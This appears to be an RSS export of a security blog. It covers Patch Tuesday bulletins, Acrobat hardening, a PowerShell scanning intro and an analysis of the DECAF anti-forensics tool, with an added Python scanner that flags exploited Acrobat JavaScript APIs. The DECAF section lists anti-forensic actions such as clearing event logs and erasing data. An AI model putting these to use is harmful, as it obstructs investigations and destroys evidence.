<p><img src="http://praetorianprefect.com/wp-content/uploads/2010/01/ScreenHunter_08-Jan.-12-17.59.gif" alt="ScreenHunter_08 Jan. 12 17.59" title="ScreenHunter_08 Jan. 12 17.59" width="45" height="42" class="alignright size-full wp-image-2976" />A quiet Patch Tuesday for Microsoft: only one bulletin this month, and it is rated Critical only for Windows 2000, whose support is due to expire in July of this year.</p>

<hr />

<p><strong>Bulletin:</strong> <a href="http://www.microsoft.com/technet/security/bulletin/MS10-001.mspx">MS10-001</a> &#8211; Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (972270)<br />
<strong>Recommended Action:</strong> Update Windows 2000 SP4.</p>

<p><strong>My Severity Rating:</strong> Critical for Windows 2000, Low for Windows XP, Server 2003, Windows Vista, Server 2008 and Windows 7.</p>

<p><strong>Information:</strong> An issue exists in the way the Microsoft Windows Embedded OpenType (EOT) Font Engine decompresses specially crafted EOT fonts. An attacker can send a malicious Word or PowerPoint document containing a specially crafted EOT font; when the victim opens it, the attacker gains remote code execution.</p>

<hr />

<h4>Note:</h4>

<p>Microsoft announced in a blog post that the <a href="http://praetorianprefect.com/archives/2009/11/how-to-crash-windows-7-and-server-2008/">SMB bug which can crash Windows 7 and Server 2008 R2</a> will not be patched in January&#8217;s patch Tuesday. We have shown how this bug can cause a severe halt to the OS, however, Microsoft stated that they &#8220;are not aware of any active attacks using the exploit code&#8221; and are still working on an update.</p>

<hr />

<h3>Adobe Updates</h3>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/adobelq1.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/adobelq1.png" alt="adobelq" title="adobelq" width="43" height="72" class="alignright size-full wp-image-2846" /></a>Another busy month for Adobe. We&#8217;ve seen various malware circulating on the Internet using the vulnerabilities in the Util.printd, Util.printf, Collab.getIcon and Collab.collectEmailInfo functions. Today, an update is released patching the vulnerability in the Doc.media.newPlayer method in Adobe Reader, which was exploited in December.</p>
</gr_insert_placeholder>
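<p>As an added example, not code from the original post or from Adobe, the following is a first-pass triage scan for PDFs arriving at a mail gateway: it pulls out the places a PDF can carry script (streams, inflating FlateDecode since that is how the circulating samples hide their payload, plus <code>/JS (...)</code> literals) and counts references to the Acrobat JavaScript APIs named above. The sample PDF is built inline and is deliberately minimal (no cross-reference table), so it is not meant to open in a viewer; the embedded script only references the method names and contains no exploit logic. It is a triage aid, not a parser: indirect <code>/Length</code> values, nested stream dictionaries, filter chains and object streams are left to a real PDF library.</p>

```python
"""Added example (not from the post or from Adobe): a first-pass triage scan of
a PDF for the Acrobat JavaScript APIs named above. The PDF is constructed
inline and is deliberately minimal (no xref table), so it is not meant to open
in a viewer; the API list is the one quoted in the post."""
import re
import zlib
from typing import Dict, Iterator, List

# Lower-cased method names from the post; matched case-insensitively because
# Acrobat's JavaScript object names are lower case (util, media, ...).
SUSPICIOUS_API = (
    "util.printd",
    "util.printf",
    "collab.geticon",
    "collab.collectemailinfo",
    "media.newplayer",
)

# Stream dictionary immediately followed by the stream keyword. Nested
# dictionaries inside the stream dictionary are not handled in this demo.
STREAM_DICT = re.compile(rb"<<([^<>]*)>>\s*stream\r?\n")
# /JS (...) literal string; tolerates one level of balanced parentheses.
JS_LITERAL = re.compile(rb"/JS\s*\(((?:[^()\\]|\\.|\([^()]*\))*)\)", re.S)


def build_sample_pdf(js: str, compress: bool = True) -> bytes:
    """Constructed sample: a catalog whose OpenAction runs `js`, stored either
    as a FlateDecode stream (the common malware packaging) or as a literal."""
    if compress:
        body = zlib.compress(js.encode("latin-1"))
        objs = [
            b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
            b"<< /Type /Pages /Kids [] /Count 0 >>",
            b"<< /S /JavaScript /JS 4 0 R >>",
            b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(body)
            + body + b"\nendstream",
        ]
    else:
        literal = js.encode("latin-1").replace(b"\\", b"\\\\")
        objs = [
            b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
            b"<< /Type /Pages /Kids [] /Count 0 >>",
            b"<< /S /JavaScript /JS (" + literal + b") >>",
        ]
    out = [b"%PDF-1.4\n"]
    for num, obj in enumerate(objs, 1):
        out.append(b"%d 0 obj\n" % num + obj + b"\nendobj\n")
    out.append(b"trailer\n<< /Root 1 0 R >>\n%EOF\n")
    return b"".join(out)


def decoded_streams(pdf: bytes) -> Iterator[bytes]:
    """Yield stream contents with direct /Length values, inflating FlateDecode."""
    for m in STREAM_DICT.finditer(pdf):
        d = m.group(1)
        lm = re.search(rb"/Length\s+(\d+)\b(?!\s+0\s+R)", d)
        if not lm:
            continue  # indirect /Length; a full parser would resolve it
        start = m.end()
        data = pdf[start:start + int(lm.group(1))]
        if b"/FlateDecode" in d:
            try:
                data = zlib.decompress(data)
            except zlib.error:
                continue  # corrupt or multi-filter stream; skipped in this demo
        yield data


def javascript_sources(pdf: bytes) -> List[bytes]:
    """Everything that might hold script: decoded streams plus /JS literals."""
    return list(decoded_streams(pdf)) + [m.group(1) for m in JS_LITERAL.finditer(pdf)]


def scan_pdf(pdf: bytes) -> Dict[str, int]:
    """Map each suspicious API name to the number of sources it appears in."""
    hits: Dict[str, int] = {}
    for src in javascript_sources(pdf):
        text = src.decode("latin-1").lower()
        for api in SUSPICIOUS_API:
            if api in text:
                hits[api] = hits.get(api, 0) + 1
    return hits


# Constructed script that merely references two of the APIs (no exploit logic).
SAMPLE_JS = "var player = this.media.newPlayer(settings);\nCollab.collectEmailInfo(info);\n"

if __name__ == "__main__":
    for compress in (True, False):
        label = "compressed" if compress else "literal"
        print(label, scan_pdf(build_sample_pdf(SAMPLE_JS, compress)))
    print("benign", scan_pdf(build_sample_pdf("app.alert('hello');")))
```

<p>Any hit on this list in an inbound PDF is grounds for quarantine while the Reader update is rolled out; the point of inflating the streams first is that a plain string search over the raw file sees only compressed bytes and misses the same script.</p>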

<hr />

<p><strong>Bulletin:</strong> <a href="http://www.adobe.com/support/security/bulletins/apsb10-02.html">APSB10-02</a> Vulnerability in the Doc.media.newPlayer method in Adobe Reader 9.2 and Acrobat 9.2, and Adobe Reader 8.1.7 and Acrobat 8.1.7</p>

<p><strong>Recommended Action:</strong> PDFs are currently a popular vector for spreading malware and trojan downloaders. The recommended action is to update as soon as possible.</p>

<p><strong>My Severity Rating:</strong> Critical.</p>

<p><strong>Information:</strong> The update addresses the following issues:</p>

<ul>
<li><p>An unspecified memory corruption error in the Doc.media.newPlayer method can allow a remote attacker to execute arbitrary code on the system. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324">CVE-2009-4324</a></p></li>
<li><p>An array boundary issue in U3D support that could lead to code execution.</p></li>
<li><p>A DLL-loading vulnerability in 3D that could allow arbitrary code execution.</p></li>
<li><p>A memory corruption vulnerability that could lead to code execution.</p></li>
<li><p>A script injection vulnerability, addressed by changing the Enhanced Security default setting.</p></li>
<li><p>A null-pointer dereference vulnerability that could lead to denial of service.</p></li>
<li><p>A buffer overflow vulnerability in the Download Manager that could lead to code execution.</p></li>
<li><p>An integer overflow vulnerability in U3D support that could lead to code execution.</p></li>
</ul>

<hr />

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/">Regular or Decaf? Tool launched to combat COFEE</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Regular or Decaf? Tool launched to combat COFEE</title>
		<link>http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/</link>
		<comments>http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 01:21:34 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[anti-forensics]]></category>
		<category><![CDATA[cofee]]></category>
		<category><![CDATA[decaf]]></category>
		<category><![CDATA[Microsoft]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=2250</guid>
		<description><![CDATA[About a month ago, there was much news about the release of COFEE into the torrent wild. I even gave my two cents about the much hyped forensics toolkit which is provided to law enforcement for the purposes of easily capturing volatile data from personal computers during evidence collection. A tool to counter COFEE, aptly [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_07-Dec.-14-16.32.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_07-Dec.-14-16.32.gif" alt="ScreenHunter_07 Dec. 14 16.32" title="ScreenHunter_07 Dec. 14 16.32" width="150"  class="alignleft size-full wp-image-2265" /></a></p>

<p>About a month ago, there was much news about the release of COFEE into the torrent wild. I even gave <a href="http://praetorianprefect.com/archives/2009/11/more-cofee-please-on-second-thought/">my two cents</a> about the much hyped forensics toolkit which is provided to law enforcement for the purposes of easily capturing volatile data from personal computers during evidence collection. A tool to counter COFEE, aptly named DECAF, has been released as an anti-forensics tool to prevent the use of COFEE for data collection.</p>

<p>&#8220;We want to promote a healthy unrestricted free flow of internet traffic and show why law enforcement should not solely rely on Microsoft to automate their intelligent evidence finding,&#8221; one of the two hackers behind Decaf <a href="http://www.theregister.co.uk/2009/12/14/microsoft_cofee_vs_decaf">told The Register</a> in explaining the objective of the project.</p>

<h3>DECAF Details</h3>

<p>DECAF is written in Visual Basic 2005 and consists of a single executable and an XML configuration file called decaf.exe.config which contains the application settings (an XML file is also created in each user&#8217;s profile directory for that user&#8217;s specific settings).</p>

<p>When launched, it displays the end-user license agreement and asks for confirmation. Once the user accepts, it writes the following registry entry:</p>

<p>Key: <code>HKU\SOFTWARE\DECAFme</code><br />
Value: <code>AcceptedEULA</code><br />
Data: <code>true</code></p>

<p>The program then connects via HTTP to 208.68.237.165 to check the current version number and receives the following response:
<code>1.0.0|http://www.decafme.org/|</code></p>

<p>If the application does not have a network connection, it will crash upon starting up with the following event:</p>

<pre><code>EventType clr20r3, P1 decaf.exe, P2 1.0.2.0, P3 4b2679b7, P4 decaf,
 P5 1.0.2.0, P6 4b2679b7, P7 115, P8 14d, P9 
system.invalidoperationexception, P10 NIL.
</code></pre>

<div id="attachment_2277" class="wp-caption alignright" style="width: 130px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_11-Dec.-14-18.34.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_11-Dec.-14-18.34.gif" alt="Decaf Menu" title="ScreenHunter_11 Dec. 14 18.34" width="120" height="148" class="size-full wp-image-2277" /></a><p class="wp-caption-text">Decaf Menu</p></div>

<p>I produced this initially when I had my virtual host&#8217;s network interface disabled.</p>

<p>Starting the monitor puts the application in detection mode, looking for the presence of COFEE. It waits for the launch of runner.exe, the launcher in COFEE, and will perform an action based on the configuration settings. It appears the tool checks the MD5 hash of runner.exe (ab9e68c7e71ebb2d6a5b8d17e9bd6b33). In addition to detecting the launch of runner.exe, the tool performs a WMI query to detect the COFEE USB thumb drive. The WMI query used for this type of action is:</p>

<p><code>SELECT * FROM __InstanceOperationEvent WITHIN 10 WHERE TargetInstance ISA "Win32_DiskDrive"</code></p>

<p>And since the thumb drive has the COFEE label, finding its presence should not be an issue.</p>

<div id="attachment_2302" class="wp-caption aligncenter" style="width: 510px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_12-Dec.-14-18.43.gif"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/ScreenHunter_12-Dec.-14-18.43.gif" alt="Notification finding COFEE" title="ScreenHunter_12 Dec. 14 18.43" width="500" class="size-full wp-image-2302" /></a><p class="wp-caption-text">Notification finding COFEE</p></div>

<p>When COFEE is found, a notification is sent over to decafme.org (note I changed the rip field to invalid IP addresses):</p>

<p><code>GET /decaf.php?&amp;rip=299.297.141.45&amp;rtime=12142009_050704PM-5&amp;sim=false HTTP/1.1</code></p>

<p>When clicking Simulate, it mimics what <em>would</em> happen if COFEE is found, and the sim field is set to true:</p>

<p><code>GET /decaf.php?&amp;rip=299.297.141.45&amp;rtime=12142009_051522PM-5&amp;sim=true HTTP/1.1</code></p>

<h3>The Configuration Menu</h3>

<div id="attachment_2312" class="wp-caption alignright" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/lockdown_mode.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/lockdown_mode-300x252.png" alt="Lockdown Settings" title="lockdown_mode" width="300" height="252" class="size-medium wp-image-2312" /></a><p class="wp-caption-text">Lockdown Settings</p></div>

<p>In the configuration menu, there are checkboxes in the Monitor section to &#8220;Monitor USB&#8221; and &#8220;Monitor COFEE&#8221;. As discussed, these options enable checking for runner.exe and detection of the USB thumb drive. The Notification section contains options for notifying the user when detection occurs. The Actions section is the interesting part, especially editing the Lockdown Mode. Here, you can set what happens when detection occurs. Some of the options are:</p>

<ul>
<li>Shutdown the system</li>
<li>Kill selected processes</li>
<li>Disable Network, USB, CD-ROM, ports, floppy</li>
<li>Clear event viewer</li>
<li>Erase Data</li>
</ul>


<p>The configuration settings are stored per user in an XML file located in:</p>

<p><code>%USERPROFILE%\local settings\application data\DECAFme.org\Decaf.exe_Url_5fokqfogt1qso5vyeabunvhsigozqvpo\1.0.2.0</code></p>

<p>If the config for the user does not exist, the default in the launch directory is used.</p>

<h3>Conclusion</h3>

<p>When I first heard of the tool, I assumed it would also include detection of the default OS commands and Sysinternals utilities that COFEE typically runs, such as pslist.exe or tcpvcon.exe; however, in its current version this is not the case. An anti-forensics tool which expands into detecting the typical collection tools will affect investigations that use various toolkits (Helix, IRCR, etc.), not just COFEE. However, as quoted by The Register, the DECAF brewers&#8217; intention is not to derail just any collection suite, but to push law enforcement to expand beyond using what Microsoft provides them.</p>

<p>This version of DECAF is still very bitter and has quite a way to go in its development. The authors of DECAF are promising a more lightweight version or a Windows service in the next release, and text message and email triggers to enter lockdown mode remotely in future versions. However, DECAF provides a good example of how anti-forensic tools continue to evolve and can become serious roadblocks for digital forensic investigators.</p>

<h3>Updates</h3>

<p>The authors of Decaf have shut down the project and have said they are starting a forum for those interested in further discussing related matters. Considered a spoof, stunt, hoax, and many other names in the media, we have discussed the matter in the <a href="http://praetorianprefect.com/archives/2009/12/reactivating-decaf-in-two-minutes/">following post</a>.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/04/winpe-3-0-forensics/">WinPE 3.0 &#038; Forensics</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/12/regular-or-decaf-tool-launched-to-combat-cofee/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Six Bulletins in Last Patch Tuesday of 2009</title>
		<link>http://praetorianprefect.com/archives/2009/12/six-bulletins-in-last-patch-tuesday-of-2009/</link>
		<comments>http://praetorianprefect.com/archives/2009/12/six-bulletins-in-last-patch-tuesday-of-2009/#comments</comments>
		<pubDate>Tue, 08 Dec 2009 19:39:55 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[ie]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patch tuesday]]></category>
		<category><![CDATA[updates]]></category>
		<category><![CDATA[vulnerabilities]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=2088</guid>
		<description><![CDATA[Today marks the last Microsoft patch Tuesday of 2009, and Microsoft has released patches to six bulletins:

MS09-071 &#8211; Vulnerabilities in Internet Authentication Service Could Allow Remote Code Execution (974318)
MS09-074 &#8211; Vulnerability in Microsoft Office Project Could Allow Remote Code Execution (967183)
MS09-072 &#8211; Cumulative Security Update for Internet Explorer (976325)
MS09-069 &#8211; Vulnerability in Local [...]]]></description>
			<content:encoded><![CDATA[<p>Today marks the last Microsoft patch Tuesday of 2009, and Microsoft has released patches to six bulletins:</p>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/image_31_3.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="image_3[1]_3" border="0" alt="image_3[1]_3" src="http://praetorianprefect.com/wp-content/uploads/2009/12/image_31_3.png" width="69" height="81" /></a></p>

<ul>
<li><strong>MS09-071</strong> &#8211; Vulnerabilities in Internet Authentication Service Could Allow Remote Code Execution (974318)</li>
<li><strong>MS09-074</strong> &#8211; Vulnerability in Microsoft Office Project Could Allow Remote Code Execution (967183) </li>
<li><strong>MS09-072</strong> &#8211; Cumulative Security Update for Internet Explorer (976325) </li>
<li><strong>MS09-069</strong> &#8211; Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service (974392) </li>
<li><strong>MS09-070</strong> &#8211; Vulnerabilities in Active Directory Federation Services Could Allow Remote Code Execution (971726) </li>
<li><strong>MS09-073</strong> &#8211; Vulnerability in WordPad and Office Text Converters Could Allow Remote Code Execution (975539) </li>
</ul>

<h3>Severity Levels</h3>

<p>Microsoft has a <a href="http://www.microsoft.com/technet/security/bulletin/rating.mspx" target="_blank">rating system</a> for bulletins which includes: Critical, Important, Moderate, and Low. The severity levels I provide below are not directly from Microsoft. For example, Microsoft will give an Important rating when exploitation could result in compromise of availability, as in a denial of service. MS09-069 can result in a denial of service; however, the attacker must already be authenticated. For this reason I drop the severity to Low.</p>

<h3>Bulletin Summaries</h3>

<hr />

<p><strong>Bulletin:</strong> MS09-071<br/>
<strong>Recommended Action:</strong> Update Windows 2008 Server (32-bit and 64-bit) which have IAS configured to use PEAP with MS-CHAP v2 authentication.<br/>
<strong>My Severity Rating:</strong> Moderate; patch the above-mentioned software.</p>

<p>This update addresses two vulnerabilities in the Internet Authentication Service (IAS). One is an IAS memory corruption vulnerability and the second is an authentication bypass vulnerability in MS-CHAP authentication. Client operating systems contain the vulnerable code but the components are not used in a way to make them vulnerable.</p>

<hr />

<p><strong>Bulletin:</strong> MS09-074<br/>
<strong>Recommended Action:</strong> Update MS Project 2000 SR-1.<br/>
<strong>My Severity Rating:</strong> Important for Project Software</p>

<p>This update addresses a vulnerability in Microsoft Project which can cause remote code execution when a specially crafted Project file is opened. Microsoft Project 2000 SR-1, Project 2002 SP1 and Project 2003 SP3 are affected.</p>

<hr />

<p><strong>Bulletin:</strong> MS09-072<br/>
<strong>Recommended Action:</strong> Update Internet Explorer<br/>
<strong>My Severity Rating:</strong> Critical</p>

<p>This update addresses five different vulnerabilities, at least one of which affects every version of Internet Explorer. Attackers can host malicious code which can lead to remote code execution on vulnerable systems. Any issue that leads to remote execution in IE should be addressed immediately; even if you are confident about not browsing malicious sites, a known site, <a href="http://praetorianprefect.com/archives/2009/12/pentagon-web-pwned/">such as the Pentagon web site</a>, could be used to automatically execute or redirect you to malicious code using cross-site scripting.</p>

<hr />

<p><strong>Bulletin:</strong> MS09-069<br/>
<strong>Recommended Action:</strong> Update Windows 2000, Windows XP and Windows 2003<br/>
<strong>My Severity Rating:</strong> Low</p>

<p>A vulnerability in LSASS can cause a denial of service. The attacker must be authenticated and communicating through IPsec.</p>

<hr />

<p><strong>Bulletin:</strong> MS09-070<br/>
<strong>Recommended Action:</strong> Update Windows 2003 and Windows 2008 Servers<br/>
<strong>My Severity Rating:</strong> Low</p>

<p>This update addresses two vulnerabilities in Active Directory Federation Services, one which can be used to spoof an authenticated user and the second which can cause remote code execution. The spoofing requires access to a workstation and browser recently used by a targeted user and the remote code execution requires the attacker to have valid logon credentials to the vulnerable server.</p>

<hr />

<p><strong>Bulletin:</strong> MS09-073<br/>
<strong>Recommended Action:</strong> Update Windows XP SP3 and/or Office 2003 SP3<br/>
<strong>My Severity Rating:</strong> Moderate</p>

<p>A vulnerability in text converters in WordPad and Office can cause remote code execution. Malicious code can be hosted on a website to trigger an exploit, however, an attempt would cause a dialog box to appear prompting the user to open the file (unless the option to “Always ask before opening this type of file” has been unchecked).</p>

<hr />

<h3>Adobe</h3>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/adobelq.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="adobe-lq" border="0" alt="adobe-lq" src="http://praetorianprefect.com/wp-content/uploads/2009/12/adobelq_thumb.png" width="47" height="76" /></a></p>

<p>Adobe has mirrored the patch Tuesday schedule of releasing patches on the first Tuesday of the month. The severity ratings also follow the same definitions as Microsoft&#8217;s.</p>

<p>Adobe has two advisories for this month:</p>

<hr />

<p><strong>Bulletin:</strong> APSA09-06<br />
<strong>Recommended Action:</strong> Update Adobe Illustrator CS4 and earlier (available Jan 8).<br />
<strong>My Severity Rating:</strong> Low</p>

<p>A vulnerability in Illustrator CS4 and earlier could lead to remote code execution. The target is required to open a malicious EPS file.</p>

<hr />

<p><strong>Bulletin:</strong> APSA09-17<br />
<strong>Recommended Action:</strong> Update Adobe Flash Player and Adobe AIR<br/>
<strong>My Severity Rating:</strong> Low</p>

<p>Adobe states this is a critical update and it is scheduled for release today, but does not provide details of the update.</p>

<h3>Updates</h3>

<p>Adobe has released details on the Flash Player update. The update addresses six vulnerabilities, five of which can lead to remote code execution and one to information disclosure. The vulnerabilities were identified in Flash Player version 10.0.32.18 and earlier.</p>

<h3>References</h3>

<ul>
<li><a href="http://www.microsoft.com/technet/security/Bulletin/MS09-dec.mspx">Microsoft&#8217;s December Bulletins</a></li>
<li><a href="http://www.adobe.com/support/security/">Adobe&#8217;s Security Advisories</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/">Turning an ATM into a Slot Machine</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/12/six-bulletins-in-last-patch-tuesday-of-2009/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Disabling Javascript on Adobe Acrobat</title>
		<link>http://praetorianprefect.com/archives/2009/12/disabling-javascript-on-adobe-acrobat/</link>
		<comments>http://praetorianprefect.com/archives/2009/12/disabling-javascript-on-adobe-acrobat/#comments</comments>
		<pubDate>Wed, 02 Dec 2009 02:20:45 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[pdf]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=2840</guid>
		<description><![CDATA[For many users, PDF's are simply a mechanism for providing documents to read. Given the spate of vulnerabilities identified in Acrobat and Reader in 2009, and the likely promise of more in 2010, we are releasing by request this general instruction for disabling Javascript in Adobe Acrobat. An advisable approach, depending on your usage of these products, may be to disable Javascript and only re-enable when performing an activity with a PDF that requires Javascript be enabled, such as with an eForm.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/adobelq1.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/12/adobelq1.png" alt="adobelq" title="adobelq" width="43" height="72" class="alignleft size-full wp-image-2846" /></a></p>

<p>Adobe&#8217;s implementation of Javascript in PDF documents, referred to as <a href="http://www.adobe.com/devnet/acrobat/pdfs/Acro6JSGuide.pdf">Acrobat JavaScript</a>, appears to have been originally introduced based on the popularity of PDF eForms. Javascript allows for some dynamic behaviors in PDF&#8217;s, including calculations, responses to user actions, user data validation, and the integration of other dynamic capabilities.</p>

<p>That said, for many users PDF&#8217;s are simply a mechanism for providing documents to read. Given the spate of vulnerabilities identified in Acrobat and Reader in 2009, and the likely promise of more in 2010, we are releasing by request this general instruction for disabling Javascript in Adobe Acrobat. An advisable approach, depending on your usage of these products, may be to disable Javascript and only re-enable when performing an activity with a PDF that requires Javascript be enabled, such as with an eForm.</p>

<p>Adobe notes that disabling Javascript mitigates the exploits identified this year that use Javascript functions to cause a memory corruption, although in some cases it would be possible to create variants that do not rely on Javascript. To disable Javascript in Adobe Reader or Acrobat: select Edit > Preferences, select the JavaScript option on the left, and uncheck the <i>Enable Acrobat JavaScript</i> option as shown.</p>

<div id="attachment_916" class="wp-caption alignnone" style="width: 650px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/AcrobatPreferences.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/AcrobatPreferences.png" alt="Uncheck to disable Acrobat JavaScript" title="AcrobatPreferences" width="640" height="424" class="size-full wp-image-916" /></a><p class="wp-caption-text">Uncheck to disable Acrobat JavaScript</p></div>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/12/disabling-javascript-on-adobe-acrobat/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>From Promiscuous to Port Scanning with Powershell</title>
		<link>http://praetorianprefect.com/archives/2009/11/from-promiscuous-to-port-scanning-with-powershell/</link>
		<comments>http://praetorianprefect.com/archives/2009/11/from-promiscuous-to-port-scanning-with-powershell/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 19:04:15 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Administration]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[portscan]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[scripting]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=1924</guid>
		<description><![CDATA[It&#8217;s been a while since my last post regarding Powershell which showed how to scan hosts for network interfaces in promiscuous mode. This time around, we’ll scan for some well known ports in our Active Directory to see who has a local IIS or SQL Express running on their machine. I know what you’re thinking. [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/12/powershell1.jpg"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="powershell1" border="0" alt="powershell1" src="http://praetorianprefect.com/wp-content/uploads/2009/12/powershell1_thumb.jpg" width="84" height="62" /></a></p>

<p>It&#8217;s been a while since <a href="http://praetorianprefect.com/archives/2009/09/whos-being-promiscuous-in-your-active-directory/" target="_blank">my last post regarding Powershell</a> which showed how to scan hosts for network interfaces in promiscuous mode. This time around, we’ll scan for some well known ports in our Active Directory to see who has a local IIS or SQL Express running on their machine. I know what you’re thinking. A port scanner? I already use trusty old NMAP or Superscan. This is not about port scanning, it’s about Powershell. In the last post, we used the <code>MSNdis_CurrentPacketFilter</code> class of WMI to find any network cards in promiscuous mode, using Active Directory computer objects as our targets. Once again, I keep the AD query of computer objects as a way to source target hosts, but the scripts can easily be modified to take in a hosts file or an IP range. For making connections, let’s look into the <code>System.Net.Sockets</code> namespace.</p>

<p>When I started looking into a method I can use to establish a connection to a given port in order to check if it was open, I went with a Connect method using the <code>System.Net.Sockets.Socket</code> class. This isn’t what I ended up using in the finished script, but I want to mention this class, because it can be used to send data to a connected socket, or to receive data on a listening socket (there is a listen method as well). Perhaps a more detailed post will materialize on those items, but I haven’t thought of a reason to use them yet. Maybe we can convert <a href="http://praetorianprefect.com/archives/2009/11/how-to-crash-windows-7-and-server-2008/" target="_blank">Gaffie’s Python code that crashes Windows 7</a> into a Powershell script one day.</p>

